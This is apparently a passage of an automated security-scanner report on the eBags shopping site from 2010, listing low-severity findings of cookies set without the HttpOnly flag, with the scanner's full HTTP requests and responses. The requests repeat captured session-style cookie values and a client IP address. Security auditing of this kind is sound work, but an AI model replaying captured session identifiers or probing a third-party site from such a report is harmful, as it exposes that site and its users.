SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.3. http://www.ebags.com/blocks/ajax/certonaajax.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/blocks/ajax/certonaajax.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 13:56:03 GMT; path=/
ACCT=guest; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blocks/ajax/certonaajax.cfm?type=productDetail&modelid=120830&_=1293371745972 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SOURCEID=BECOME01%24COUPONID%3D40959822; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; ACCT=guest; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 26 Dec 2010 13:56:03 GMT
Content-Type: text/json; charset=utf-8
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 13:56:03 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 53

{ "AlsoViewed" : " ", "OtherRecommendations" : " " }

3.4. http://www.ebags.com/blocks/ajax/persistentCart.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/blocks/ajax/persistentCart.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:58:50 GMT; path=/
ACCT=guest; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /blocks/ajax/persistentCart.cfm HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822
Origin: http://www.ebags.com
X-Requested-With: XMLHttpRequest
Content-Type: application/xml
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_cc=true; s_campaign=BEC; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; ACCT=guest; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbDomTm=0; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; __cmbTpvTm=1807; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":1,"to":3,"c":"http://www.ebags.com/product/case-logic/sony-psp-game-case/120830","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}
Content-Length: 0

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 26 Dec 2010 13:58:50 GMT
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:58:50 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 106

<script>
eBags.microCart.originalCartItemCount = 0;
eBags.microCart.cartItemCount = 0;
</script>

3.5. http://www.ebags.com/blocks/ajax/productEDD.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/blocks/ajax/productEDD.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=BECOME01%24COUPONID%3D409598226342D8A3CFF649EABBA3DA7F; expires=Sun, 02-Jan-2011 14:02:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blocks/ajax/productEDD.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:24 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D409598226342D8A3CFF649EABBA3DA7F; expires=Sun, 02-Jan-2011 14:02:24 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 8

3.6. http://www.ebags.com/blocks/dsp_non_discountable_brands.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/blocks/dsp_non_discountable_brands.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=6342D8A3A72905B3C84F9D85; expires=Sun, 02-Jan-2011 14:02:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blocks/dsp_non_discountable_brands.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:14 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=6342D8A3A72905B3C84F9D85; expires=Sun, 02-Jan-2011 14:02:14 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 36836

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<script language="javascript">
function redir(site)
{
window.opener.location.href = site;
window.close()
}
function
...[SNIP]...

3.7. http://www.ebags.com/blocks/dsp_prop65.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/blocks/dsp_prop65.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=6342D8A3A72905B3C84F9D85; expires=Sun, 02-Jan-2011 14:02:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blocks/dsp_prop65.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:17 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=6342D8A3A72905B3C84F9D85; expires=Sun, 02-Jan-2011 14:02:17 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 5437

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<script language="javascript">
function redir(site)
{
window.opener.location.href = site;
window.close()
}
function
...[SNIP]...

3.8. http://www.ebags.com/brand/athalon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/athalon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/athalon HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 26 Dec 2010 14:13:24 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Location: /index.cfm?Brand_10296_Not_Active_Link=yes
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:24 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1174

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.cfm%3fBrand_10296_Not_Active_Link%3dyes">here</a>.</h2>
</body></html>
<!-- Omniture Error: System.NullRef
...[SNIP]...

3.9. http://www.ebags.com/brand/bosca previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/bosca

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:12:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/bosca HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.10. http://www.ebags.com/brand/burton previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/burton

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/burton HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.11. http://www.ebags.com/brand/eagle-creek previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/eagle-creek

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:12:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/eagle-creek HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.12. http://www.ebags.com/brand/fleurville previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/fleurville

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/fleurville HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.13. http://www.ebags.com/brand/hobo-international previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/hobo-international

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:20 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/hobo-international HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.14. http://www.ebags.com/brand/hurley previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/hurley

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/hurley HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.15. http://www.ebags.com/brand/ju-ju-be previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/ju-ju-be

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/ju-ju-be HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.16. http://www.ebags.com/brand/kalencom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/kalencom

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/kalencom HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.17. http://www.ebags.com/brand/lego previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/lego

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/lego HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
